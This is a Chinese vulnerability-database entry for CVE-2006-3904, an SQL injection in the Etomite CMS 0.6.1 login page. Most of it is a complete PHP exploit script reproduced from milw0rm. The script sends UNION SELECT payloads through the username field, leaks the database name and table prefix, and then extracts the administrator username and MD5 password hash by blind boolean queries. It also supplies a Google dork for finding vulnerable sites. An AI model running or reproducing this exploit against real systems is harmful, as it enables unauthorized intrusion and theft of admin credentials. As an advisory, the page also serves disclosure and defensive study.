Etomite 'Index.PHP' SQL注入漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1110683 漏洞类型 SQL注入
发布时间 2006-07-25 更新时间 2006-08-07
CVE编号 CVE-2006-3904 CNNVD-ID CNNVD-200607-458
漏洞平台 PHP CVSS评分 6.8
|漏洞来源
https://www.exploit-db.com/exploits/2071
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200607-458
|漏洞详情
EtomiteCMS0.6.1及更早版本中的manager/index.php存在SQL注入漏洞,当magic_quotes_gpc禁用时,远程攻击者可以通过username参数执行任意SQL命令。
|漏洞EXP
#!/usr/bin/php -q -d short_open_tag=on
<?
echo "Etomite CMS <= 0.6.1 (all patches applied) 'username' SQL injection / admin credentials disclosure\r\n";
echo "by rgod rgod@autistici.org\r\n";
echo "site: http://retrogod.altervista.org\r\n";
echo "google dork: \"Content managed by the Etomite Content Management System\"\r\n\r\n";

/*
works with magic_quotes_gpc=Off
*/

if ($argc<3) {
echo "Usage: php ".$argv[0]." host path OPTIONS\r\n";
echo "host:      target server (ip/hostname)\r\n";
echo "path:      path to etomite\r\n";
echo "Options:\r\n";
echo "   -T[prefix]:  specify a table prefix (default: etomite_)\r\n";
echo "   -p[port]:    specify a port other than 80\r\n";
echo "   -P[ip:port]: specify a proxy\r\n";
echo "Examples:\r\n";
echo "php ".$argv[0]." localhost /etomite/ \r\n";
echo "php ".$argv[0]." localhost / -P1.1.1.1:80\r\n";
die;
}
/*
software site: http://www.etomite.org/

explaination:

goto http://[target]/[path_to_etomite]/manager/index.php

and, if magic_quotes_gpc=Off you have sql injection in 'username' argument

you *could* bypass login check with a well crafted 'UNION SELECT' but the
following 'REPLACE INTO' query will fail.
Through the error message you can disclose database name and table prefix
that will be useful to go on with a new attack, asking true/false questions
to the database to dislose username/md5 hash pair...

*/
error_reporting(0);
ini_set("max_execution_time",0);
ini_set("default_socket_timeout",5);

function quick_dump($string)
{
  $result='';$exa='';$cont=0;
  for ($i=0; $i<=strlen($string)-1; $i++)
  {
   if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 ))
   {$result.="  .";}
   else
   {$result.="  ".$string[$i];}
   if (strlen(dechex(ord($string[$i])))==2)
   {$exa.=" ".dechex(ord($string[$i]));}
   else
   {$exa.=" 0".dechex(ord($string[$i]));}
   $cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";}
  }
 return $exa."\r\n".$result;
}
$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';
function sendpacketii($packet)
{
  global $proxy, $host, $port, $html, $proxy_regex;
  if ($proxy=='') {
    $ock=fsockopen(gethostbyname($host),$port);
    if (!$ock) {
      echo 'No response from '.$host.':'.$port; die;
    }
  }
  else {
	$c = preg_match($proxy_regex,$proxy);
    if (!$c) {
      echo 'Not a valid proxy...';die;
    }
    $parts=explode(':',$proxy);
    echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n";
    $ock=fsockopen($parts[0],$parts[1]);
    if (!$ock) {
      echo 'No response from proxy...';die;
	}
  }
  fputs($ock,$packet);
  if ($proxy=='') {
    $html='';
    while (!feof($ock)) {
      $html.=fgets($ock);
    }
  }
  else {
    $html='';
    while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {
      $html.=fread($ock,1);
    }
  }
  fclose($ock);
  #debug
  #echo "\r\n".$html;
}

function is_hash($hash)
{
 if (ereg("^[a-f0-9]{32}",trim($hash))) {return true;}
 else {return false;}
}

function my_encode($my_string)
{
  $encoded="CHAR(";
  for ($k=0; $k<=strlen($my_string)-1; $k++)
  {
    $encoded.=ord($my_string[$k]);
    if ($k==strlen($my_string)-1) {$encoded.=")";}
    else {$encoded.=",";}
  }
  return $encoded;
}

$host=$argv[1];
$path=$argv[2];
$port=80;
$proxy="";
for ($i=3; $i<=$argc-1; $i++){
$temp=$argv[$i][0].$argv[$i][1];
if ($temp=="-p")
{
  $port=str_replace("-p","",$argv[$i]);
}
if ($temp=="-P")
{
  $proxy=str_replace("-P","",$argv[$i]);
}
if ($temp=="-T")
{
  $refix=str_replace("-T","",$argv[$i]);
}
}

if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;}
if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}

$prefix="etomite_"; //default
$dbname="etomite"; //default

// ** disclose dbname & table prefix **
$sql="99999999$'/**/UNION/**/SELECT/**/0,'sutnzu',MD5('suntzu'),0,0,0,0,0,0,0,0,0,0,0,0,0,0/*";
echo "sql -> ".$sql."\r\n";
$sql=urlencode($sql);
$data="rememberme=1";
$data.="&location=";
$data.="&username=".$sql;
$data.="&password=suntzu";
$data.="&thing=";
$data.="&submit=Login";
$data.="&licenseOK=1";
$packet ="POST ".$p."manager/processors/login.processor.php HTTP/1.0\r\n";
$packet.="Content-Type: application/x-www-form-urlencoded\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Content-Length: ".strlen($data)."\r\n";
$packet.="Connection: Close\r\n\r\n";
$packet.=$data;
sendpacketii($packet);
$temp=explode("Set-Cookie: ",$html);
$cookie="";
for ($i=1; $i<=count($temp)-1; $i++)
{
$temp2=explode(" ",$temp[$i]);
$cookie.=" ".$temp2[0];
}
$packet ="GET ".$p."manager/index.php HTTP/1.0\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Cookie: ".$cookie."\r\n";
$packet.="Connection: Close\r\n\r\n";
sendpacketii($packet);
if (strstr($html,"REPLACE INTO"))
{
$temp=explode("REPLACE INTO `",$html);
$temp2=explode("active_users",$temp[1]);
$temp=explode("`.",$temp2[0]);
$dbname=$temp[0];
$prefix=$temp[1];
}
else
{
echo "using default values for dbame & prefix...\r\n";
}
echo "database name -> ".$dbname."\r\n";
echo "table prefix  -> ".$prefix."\r\n";
sleep(2);
//** end **

//** launch exploit **
$md5s[0]=0;//null
$md5s=array_merge($md5s,range(48,57)); //numbers
$md5s=array_merge($md5s,range(97,102));//a-f letters
//print_r(array_values($md5s));
$password="";
$j=1;
while (!strstr($password,chr(0)))
{
for ($i=0; $i<=255; $i++)
{
if (in_array($i,$md5s))
{
$sql="99999999$'/**/UNION/**/SELECT/**/0,'suntzu',(IF((ASCII(SUBSTRING(password,".$j.",1))=".$i."),MD5('suntzu'),-1)),0,0,0,0,0,0,0,0,0,0,0,0,0,0/**/FROM/**/`".$dbname."`.".$prefix."manager_users,`".$dbname."`.".$prefix."user_attributes/*";
echo "sql -> ".$sql."\r\n";
$sql=urlencode($sql);
$data="rememberme=1";
$data.="&location=";
$data.="&username=".$sql;
$data.="&password=suntzu";
$data.="&thing=";
$data.="&submit=Login";
$data.="&licenseOK=1";
$packet ="POST ".$p."manager/processors/login.processor.php HTTP/1.0\r\n";
$packet.="Content-Type: application/x-www-form-urlencoded\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Content-Length: ".strlen($data)."\r\n";
$packet.="Connection: Close\r\n\r\n";
$packet.=$data;
sendpacketii($packet);
if (!strstr($html,"Incorrect username or password entered")) {$password.=chr($i);echo "password -> ".$password."[???]\r\n";sleep(2);break;}
}
if ($i==255) {die("Exploit failed...");}
}
$j++;
}

$admin="";
$j=1;
while (!strstr($admin,chr(0)))
{
for ($i=0; $i<=255; $i++)
{
$sql="99999999$'/**/UNION/**/SELECT/**/0,'suntzoi',(IF((ASCII(SUBSTRING(username,".$j.",1))=".$i."),MD5('suntzoi'),-1)),0,0,0,0,0,0,0,0,0,0,0,0,0,0/**/FROM/**/`".$dbname."`.".$prefix."manager_users,`".$dbname."`.".$prefix."user_attributes/*";
echo "sql -> ".$sql."\r\n";
$sql=urlencode($sql);
$data="rememberme=1";
$data.="&location=";
$data.="&username=".$sql;
$data.="&password=suntzoi";
$data.="&thing=";
$data.="&submit=Login";
$data.="&licenseOK=1";
$packet ="POST ".$p."manager/processors/login.processor.php HTTP/1.0\r\n";
$packet.="Content-Type: application/x-www-form-urlencoded\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Content-Length: ".strlen($data)."\r\n";
$packet.="Connection: Close\r\n\r\n";
$packet.=$data;
sendpacketii($packet);
if (!strstr($html,"Incorrect username or password entered")) {$admin.=chr($i);echo "admin -> ".$admin."[???]\r\n";sleep(2);break;}
if ($i==255) {die("Exploit failed...");}
}
$j++;
}
echo "-----------------------------------------------------------------------\r\n";
echo "admin          -> ".$admin."\r\n";
echo "password (md5) -> ".$password."\r\n";
echo "-----------------------------------------------------------------------\r\n";
?>

# milw0rm.com [2006-07-25]
|参考资料

来源:SECUNIA
名称:21167
链接:http://secunia.com/advisories/21167
来源:VUPEN
名称:ADV-2006-2961
链接:http://www.frsirt.com/english/advisories/2006/2961
来源:MILW0RM
名称:2071
链接:http://milw0rm.com/exploits/2071
来源:XF
名称:etomite-username-sql-injection(27943)
链接:http://xforce.iss.net/xforce/xfdb/27943
来源:BID
名称:19150
链接:http://www.securityfocus.com/bid/19150
来源:OSVDB
名称:27485
链接:http://www.osvdb.org/27485
来源:www.etomite.org
链接:http://www.etomite.org/forums/index.php?showtopic=5706&st=0&p=35307&#entry35307
来源:SECTRACK
名称:1016594
链接:http://securitytracker.com/id?1016594
来源:MISC
链接:http://retrogod.altervista.org/etomite_061_sql.html